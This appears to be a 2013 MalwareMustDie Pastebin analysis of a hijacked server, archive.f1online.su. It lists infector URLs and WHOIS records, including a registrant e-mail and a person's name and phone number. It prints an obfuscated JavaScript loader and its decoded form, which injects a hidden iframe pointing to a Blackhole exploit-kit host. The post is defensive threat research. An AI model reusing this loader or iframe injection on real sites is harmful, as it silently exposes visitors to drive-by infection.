Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =======================================
- MalwareMustDie - Happy New Year Case-2
- A huge infector found at the archive.f1online.su server
- Using iframe implemented in hijacked service who got suspended..
- Leads to the blackhole infector server
- ======================================
- // The domain DNS info:
- domain: F1ONLINE.SU
- nserver: ns1.ns64.com.
- nserver: ns2.ns64.com.
- state: REGISTERED, DELEGATED
- person: Private Person
- e-mail: hanprokiller@yandex.ru
- registrar: RUCENTER-REG-FID
- created: 2010.03.16
- paid-till: 2013.03.16
- free-date: 2013.04.18
- source: TCI
- Last updated on 2013.01.02 15:51:35 MSK
- // infector list, source: spam...
- h00p://archive.f1online.su/index.php?s=d5a3b3c8f8855b90b67579b9fd39bbe2
- h00p://archive.f1online.su/index.php?s=da72acb03a8c6a6460f8aa387625a37d
- h00p://archive.f1online.su/index.php?s=131cfaa384f22f721bb81ad0275dfd3f
- h00p://archive.f1online.su/index.php?s=8ce2104fd43bc6c8af664d757e01acec
- h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
- h00p://archive.f1online.su/index.php?s=b23146819cecca9e3de98e23800bff3d
- h00p://archive.f1online.su/index.php?s=b49cf7d91b07bb39216f946b623d0e54
- h00p://archive.f1online.su/index.php?s=c2b1aaa4827966f2018fd671af059f0d
- h00p://archive.f1online.su/index.php?s=399a97a8f5feef4e422e71100d65b04e
- h00p://archive.f1online.su/index.php?s=58cf2c05d3083c4c4eda5f4ab5ceceee
- h00p://archive.f1online.su/index.php?s=6292625e82405d536331dd9c9ab8ffe6
- h00p://archive.f1online.su/index.php?s=3129b4644c29651880aa5503d2aea421
- h00p://archive.f1online.su/index.php?s=04353b7557a3ec62bbcd8eff0da7d0db
- h00p://archive.f1online.su/index.php?s=0d754c23fdd68d34d3b13ba2f6aa1bd2
- h00p://archive.f1online.su/index.php?s=0e52ee1ca43b6c43f64ca5f88eed5b0e
- h00p://archive.f1online.su/index.php?s=138b24f83fa0ea20b4c5b9a727ea171b
- h00p://archive.f1online.su/index.php?s=18e2c8e11af7af1405dfcdb1d193ea26
- h00p://archive.f1online.su/index.php?s=1b224d7e67f58d246d75898fe83ee58b
- h00p://archive.f1online.su/index.php?s=1d5b20045845fcc58dc82a4889938367
- h00p://archive.f1online.su/index.php?s=22ccde98b2c7c45f851512f4bbf6efc6
- h00p://archive.f1online.su/index.php?s=2323d0f652bb265f425d6c79fd539d89
- h00p://archive.f1online.su/index.php?s=295c3ddf5502be60a6ddab3f7927c0fc
- h00p://archive.f1online.su/index.php?s=2b3ec7e463b0454ec505b5e229037d6b
- h00p://archive.f1online.su/index.php?s=2dabc115cfb693551cd71b5e8b41d579
- h00p://archive.f1online.su/index.php?s=362dbf94cd641e8dca4aa07cbc116732
- h00p://archive.f1online.su/index.php?s=409142b821fb10c20112aeb78ed7e06d
- h00p://archive.f1online.su/index.php?s=410a91e7daddbf1e2dc8449a25a45db4
- h00p://archive.f1online.su/index.php?s=46dcfe76e53f74f558c722573cb906ed
- h00p://archive.f1online.su/index.php?s=52244e06882800db3145a6a18c3113c1
- h00p://archive.f1online.su/index.php?s=53313082818c54d9d855ce4c93426fe8
- h00p://archive.f1online.su/index.php?s=6135fbb39b9ca6efa376047868ffb43c
- h00p://archive.f1online.su/index.php?s=6183bef649a5fbc1cbd29eff88f92f4b
- h00p://archive.f1online.su/index.php?s=7ce20d2ee2f97d032467a2c59efb1dca
- h00p://archive.f1online.su/index.php?s=88766cda76176567b6db0c65a6cf3e4c
- h00p://archive.f1online.su/index.php?s=8c2136f1fdf675602f5d028dfd959229
- h00p://archive.f1online.su/index.php?s=8c73e620862e1035bd1e6c2fc6e54e30
- h00p://archive.f1online.su/index.php?s=8ce2104fd43bc6c8af664d757e01acec
- h00p://archive.f1online.su/index.php?s=94884ac430d59aa095bba6005bed0799
- h00p://archive.f1online.su/index.php?s=a52ab4a411f20cb7e2169dc5792e74c1
- h00p://archive.f1online.su/index.php?s=a8751598404f32180a032f80c587e90f
- h00p://archive.f1online.su/index.php?s=a92f3e65fde506cba2940d98549dbee7
- h00p://archive.f1online.su/index.php?s=ab433f610314fc8cbdb7165c38d8ec8a
- h00p://archive.f1online.su/index.php?s=abe7af0160a74edaea0e2e1a4c8ddc0f
- h00p://archive.f1online.su/index.php?s=b49cf7d91b07bb39216f946b623d0e54
- h00p://archive.f1online.su/index.php?s=b991b55d9c1ce024cd71ac3625be9283
- h00p://archive.f1online.su/index.php?s=c834c0bd26611e2f2a61e33a6da19301
- h00p://archive.f1online.su/index.php?s=ce165aa157e99f9cc5451ae064939db8
- h00p://archive.f1online.su/index.php?s=d009d525c8b0745eb00c4afcaaaf53a8
- h00p://archive.f1online.su/index.php?s=d4e55883d699a609afa8354654650d55
- h00p://archive.f1online.su/index.php?s=da72acb03a8c6a6460f8aa387625a37d
- h00p://archive.f1online.su/index.php?s=e1e7ea97d1f6c0a1c4e0b8458306e20d
- h00p://archive.f1online.su/index.php?s=e54c28ef1f9ca3e043c8674c5fb4382e
- h00p://archive.f1online.su/index.php?s=ed006750e61bbdb5be3c651cb6834c09
- h00p://archive.f1online.su/index.php?s=1709a21b05e36cd940a007aa0e33bb53
- h00p://archive.f1online.su/index.php?s=21f3aad0bc10971fe5e25c5144cb50e2
- h00p://archive.f1online.su/index.php?s=2217f2ea0fbdef8a1c26918296fc2de1
- h00p://archive.f1online.su/index.php?s=2f74ed02afceb0ffd6893d8e98f992f4
- h00p://archive.f1online.su/index.php?s=31c8a52821aede0a7589d1e5b4f072ea
- h00p://archive.f1online.su/index.php?s=34dfef85a9214579853c522fc34df05f
- h00p://archive.f1online.su/index.php?s=42ae9d94d436b57e0b5ac7786b329ea4
- h00p://archive.f1online.su/index.php?s=5df8da2fd399506615b03b00dbc4d6ed
- h00p://archive.f1online.su/index.php?s=78d22f89a3b4311f429e024496f383fd
- h00p://archive.f1online.su/index.php?s=81b8c150c9621b0c3b6f799487a1e534
- h00p://archive.f1online.su/index.php?s=925c42788949cf79265b3554409904ec
- h00p://archive.f1online.su/index.php?s=96d8d02500faaaafa65f4268de99d1c9
- h00p://archive.f1online.su/index.php?s=a99c41940cbde8a22872661205ea6716
- h00p://archive.f1online.su/index.php?s=bb718fc38888e178bffb48ca410fe912
- h00p://archive.f1online.su/index.php?s=bcdc3bfaac90e73ff31a4779fc9ec2ba
- h00p://archive.f1online.su/index.php?s=c456725580677878a0a664a4f1d34b73
- h00p://archive.f1online.su/index.php?s=d5feb51da3003662795e6da6964ff696
- h00p://archive.f1online.su/index.php?s=d7be50e99af481fadcb953b45781cde8
- h00p://archive.f1online.su/index.php?s=dba21cd8417246e4e6bce2b1808a5902
- h00p://archive.f1online.su/index.php?s=e500ac9e7a61015d62952742cf5fbcb4
- h00p://archive.f1online.su/index.php?s=1709a21b05e36cd940a007aa0e33bb53
- h00p://archive.f1online.su/index.php?s=21f3aad0bc10971fe5e25c5144cb50e2
- h00p://archive.f1online.su/index.php?s=2217f2ea0fbdef8a1c26918296fc2de1
- h00p://archive.f1online.su/index.php?s=2a9b6bfd6a58bc56f90b52e2cbab9b10
- h00p://archive.f1online.su/index.php?s=2f74ed02afceb0ffd6893d8e98f992f4
- h00p://archive.f1online.su/index.php?s=31c8a52821aede0a7589d1e5b4f072ea
- h00p://archive.f1online.su/index.php?s=34dfef85a9214579853c522fc34df05f
- h00p://archive.f1online.su/index.php?s=42ae9d94d436b57e0b5ac7786b329ea4
- h00p://archive.f1online.su/index.php?s=5df8da2fd399506615b03b00dbc4d6ed
- h00p://archive.f1online.su/index.php?s=78d22f89a3b4311f429e024496f383fd
- h00p://archive.f1online.su/index.php?s=81b8c150c9621b0c3b6f799487a1e534
- h00p://archive.f1online.su/index.php?s=925c42788949cf79265b3554409904ec
- h00p://archive.f1online.su/index.php?s=96d8d02500faaaafa65f4268de99d1c9
- h00p://archive.f1online.su/index.php?s=a99c41940cbde8a22872661205ea6716
- h00p://archive.f1online.su/index.php?s=bb718fc38888e178bffb48ca410fe912
- h00p://archive.f1online.su/index.php?s=bcdc3bfaac90e73ff31a4779fc9ec2ba
- h00p://archive.f1online.su/index.php?s=c456725580677878a0a664a4f1d34b73
- h00p://archive.f1online.su/index.php?s=d5feb51da3003662795e6da6964ff696
- h00p://archive.f1online.su/index.php?s=d7be50e99af481fadcb953b45781cde8
- h00p://archive.f1online.su/index.php?s=dba21cd8417246e4e6bce2b1808a5902
- h00p://archive.f1online.su/index.php?s=e500ac9e7a61015d62952742cf5fbcb4
- h00p://archive.f1online.su/index.php?s=f97d42aaa451af836c19d76fad120eb0
- h00p://archive.f1online.su/index.php?s=fe21750911f7513e0d6c159fe0334cfa
- h00p://archive.f1online.su/index.php?s=1823d888ab6adb9b61ff81d52ef8572c
- h00p://archive.f1online.su/index.php?s=373f5fde8c2d77ee35b1056945051af2
- h00p://archive.f1online.su/index.php?s=45f2062512ebe2aa74a54bb656041806
- h00p://archive.f1online.su/index.php?s=4a6ed6125fa620d2192c1dc78a1d6007
- h00p://archive.f1online.su/index.php?s=564f2cd579c8d75bf74ca60d360a9357
- h00p://archive.f1online.su/index.php?s=5e1afbfbc5e0bd039d394f5c197a4a59
- h00p://archive.f1online.su/index.php?s=6292625e82405d536331dd9c9ab8ffe6
- h00p://archive.f1online.su/index.php?s=6ae9c8cefdb2ef6cc435e335aca7db5f
- h00p://archive.f1online.su/index.php?s=7418f0876833c29b0a793464deabd19d
- h00p://archive.f1online.su/index.php?s=74bb294b933b1c71650e012f084a2187
- h00p://archive.f1online.su/index.php?s=7bd14c51e9eddb6ba8f9c728b581e93c
- h00p://archive.f1online.su/index.php?s=8ffba83945d3345010238f4d6d3179e0
- h00p://archive.f1online.su/index.php?s=9c770b3aec149213e853480db1c8c4cc
- h00p://archive.f1online.su/index.php?s=9e193b240898b13eda34c2e67f2655c2
- h00p://archive.f1online.su/index.php?s=a4635ecddac17a08e37dc6483730724f
- h00p://archive.f1online.su/index.php?s=b1b2abc2cb79a904aab5111399db9e10
- h00p://archive.f1online.su/index.php?s=c9ec224350860bee1f77ddc659525aab
- h00p://archive.f1online.su/index.php?s=d5a3b3c8f8855b90b67579b9fd39bbe2
- h00p://archive.f1online.su/index.php?s=e06e6ca5cf9052486ea7becf9c2868b0
- h00p://archive.f1online.su/index.php?s=ecc767d669cc03e39e9315eb8014f4bf
- h00p://archive.f1online.su/index.php?s=ed4d50f514c040549f86c1d3fab92f5f
- h00p://archive.f1online.su/index.php?s=f7eefb7ed4afb524245b22c07c0f97d9
- h00p://archive.f1online.su/index.php?s=f995c7f60df4ace131e3c6764570de34
- h00p://archive.f1online.su/index.php?s=277423d9d0fe29ea8b2639f3ecf2080b
- h00p://archive.f1online.su/index.php?s=3129b4644c29651880aa5503d2aea421
- h00p://archive.f1online.su/index.php?s=3b4a1c163e2056f1616fdfd7fcda5ad5
- h00p://archive.f1online.su/index.php?s=3d821d68f2391f37ab999e89f726d3ee
- h00p://archive.f1online.su/index.php?s=3f5cc53130ccea57b3edf7583e0083c0
- h00p://archive.f1online.su/index.php?s=4c02d30f9ba815e1bdbfb0df48182d6e
- h00p://archive.f1online.su/index.php?s=4c12fca580d5d29682a4cede53639412
- h00p://archive.f1online.su/index.php?s=58cf2c05d3083c4c4eda5f4ab5ceceee
- h00p://archive.f1online.su/index.php?s=66081323c1300b0259830104492d55fc
- h00p://archive.f1online.su/index.php?s=69457be192d8c4a7ac5409325c1bd56d
- h00p://archive.f1online.su/index.php?s=6ac8de47a32570076b3ed1ec44e48f8e
- h00p://archive.f1online.su/index.php?s=927654c85f02973db103bd7a4c2333c2
- h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
- h00p://archive.f1online.su/index.php?s=9e63e10da1f858a3b5df6aa29a04d3ea
- h00p://archive.f1online.su/index.php?s=b43a4854f72c6bc22e99f40ad41a651d
- h00p://archive.f1online.su/index.php?s=cd131ff66cb6d433068034ed5df482b0
- h00p://archive.f1online.su/index.php?s=d8a330901eb0e904bbca55d4175c756e
- h00p://archive.f1online.su/index.php?s=e58d852590314914b7e6c163be5a7df5
- h00p://archive.f1online.su/index.php?s=ecd86011d3a1ba7c3ce17bf7e62cffa8
- h00p://archive.f1online.su/index.php?s=f7fabe7999cea5f9af1b286dbc8c35a1
- h00p://archive.f1online.su/index.php?s=fceb561215897110117a9cc5c9898a6d
- h00p://archive.f1online.su/index.php?s=0637be835a981ffe1c1ffb5dc7904677
- h00p://archive.f1online.su/index.php?s=07a0e25ea57461f8f53ea4db15ee2f73
- h00p://archive.f1online.su/index.php?s=0904a4c5c25ca1bff1d647f2be791592
- h00p://archive.f1online.su/index.php?s=16f856380e2d686bfffbd2220de991a0
- h00p://archive.f1online.su/index.php?s=0c516b4fce7c2120fcf24baaf2a9659f
- h00p://archive.f1online.su/index.php?s=0d7f334fa963f307598547dec9bccbaa
- h00p://archive.f1online.su/index.php?s=131cfaa384f22f721bb81ad0275dfd3f
- h00p://archive.f1online.su/index.php?s=1a4ad9c330f5272644960bcb83aa0775
- h00p://archive.f1online.su/index.php?s=1af03118b5091aaf95e009fe7908100c
- h00p://archive.f1online.su/index.php?s=1b4bb0dfb0e46e2a126cd1fc2b7a69eb
- // server dns info:
- archive.f1online.su. 3600 IN A 194.28.132.130
- archive.f1online.su
- origin = ns1.ns64.com
- mail addr = webmaster.archive.f1online.su
- serial = 1
- refresh = 10800
- retry = 3600
- expire = 604800
- minimum = 3600
- //Let's check why it got infected, with what?
- // took some sample, leads to the same redirection...
- // PoC:
- h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
- // finding out the reason why....grab it..
- --20:03:25-- h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
- => `index.php@s=96f14a35edf55e062c1a613186b6a8e8'
- Resolving archive.f1online.su... seconds 0.00, 194.28.132.130
- Caching archive.f1online.su => 194.28.132.130
- Connecting to archive.f1online.su|194.28.132.130|:80... seconds 0.00, connected.
- GET /index.php?s=96f14a35edf55e062c1a613186b6a8e8 HTTP/1.0
- User-Agent: #MalwareMustDie - Wishing you a terrible 2013 year!
- Accept: */*
- Host: archive.f1online.su
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- HTTP/1.1 200 OK
- Server: nginx
- Date: Wed, 02 Jan 2013 11:03:21 GMT
- Content-Type: text/html; charset=utf-8
- Connection: close
- X-Powered-By: PHP/5.2.14
- Set-Cookie: session_id=baf0913e29b2023470b4ed83bf5f1f9f; path=/; httponly
- Content-Language: ru
- 200 OK
- Length: unspecified [text/html]
- 20:03:30 (92.29 KB/s) - `index.php@s=96f14a35edf55e062c1a613186b6a8e8' saved [261760]
- // found this obfuscation code, the question is "is it malicious??" We'll see.
- try{window.document.body=window.document.body}catch(dgsgsdg){zxc=1;}try{if(window.document)window["doc"+"ument"]["body"]=window.document}catch(bawetawe)
- {if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber)
- {if("".substr)ev=eval;}}
- n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39",
- "3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e",
- "1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g",
- "41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m",
- "4f","4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24",
- "1d","42","4e","3m","49","41","4f","2b","23","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e",
- "1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c",
- "4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29",
- "1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45",
- "42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o",
- "4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g",
- "4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m","4f",
- "4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24","1d",
- "42","4e","3m","49","41","4f","2b","23","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b",
- "1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f",
- "4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48",
- "41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g",
- "44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44",
- "4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a",
- "4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h",
- "44","45","48","40","1f","42","1g","29","d","9","9","50"];
- h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(window.document)ev(""+z)}}}
- // Shortly, de-obfuscation result:
- if (document.getElementsByTagName('body')[0]){
- iframer();
- }
- else {
- document.write("
- <iframe src='http://inmediasys.com/feed/frames.php?uid=56&frames=5' width='10' height='10'
- style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
- }
- function iframer(){
- var f = document.createElement('iframe');
- f.setAttribute('src', 'http://inmediasys.com/feed/frames.php?uid=56&frames=5');
- f.style.visibility = 'hidden';
- f.style.position = 'absolute';
- f.style.left = '0';
- f.style.top = '0';
- f.setAttribute('width', '10');
- f.setAttribute('height', '10');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
- // try to fetch this....
- --20:08:48-- http://inmediasys.com/feed/frames.php?uid=56&frames=5
- => `frames.php@uid=56&frames=5'
- Resolving inmediasys.com... seconds 0.00, failed: Unknown host.
- // seek further....
- Domain Name: INMEDIASYS.COM
- Registrant:
- N/A
- Joanie Kenny (joanie_kenny601@startrekmail.com)
- Clara Van St
- Austin
- TX,78734
- US
- Tel. +1.0898265608
- Creation Date: 20-Nov-2012
- Expiration Date: 20-Nov-2013
- Domain servers in listed order:
- ns1.suspended-domain.com
- ns2.suspended-domain.com
- // domain down, looks suspended...Question is still un0-answered, WHY?
- //
- // evidence are the below url:
- // http://inmediasys.com/feed/frames.php?uid=56&frames=5
- // let's make sure.. check every DB for similar pattern URL...
- // found in :
- // Urlquery:
- // http://193.107.85.36/report.php?id=209160
- // we found similar url
- // http://inmediasys.com/feed/xml.php?98679407&uid=56
- //It has the recorded http server header sent comm;
- GET /feed/xml.php?98679407&uid=56 HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://inmediasys.com/feed/frames.php?uid=56&frames=5
- // replied below:
- HTTP/1.1 200 OK
- Content-Type: text/html; charset=utf-8
- Server: nginx
- Date: Thu, 22 Nov 2012 16:39:35 GMT
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.3.16-1~dotdeb.0
- Cache-Control: no-store, no-cache, must-revalidate
- Content-Encoding: gzip
- // βIt's a blackhole implemented infector
- // Now we know why it is evil,
- // IFRAME used in the evil way,
- // Good thing is domains blocked except the infector used.
- // Someone must inform the cleanup to f1online.su
- ----
- #MalwareMustDie
- [0x00000000]> !date
- Wed Jan 2 20:48:05 JST 2013
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement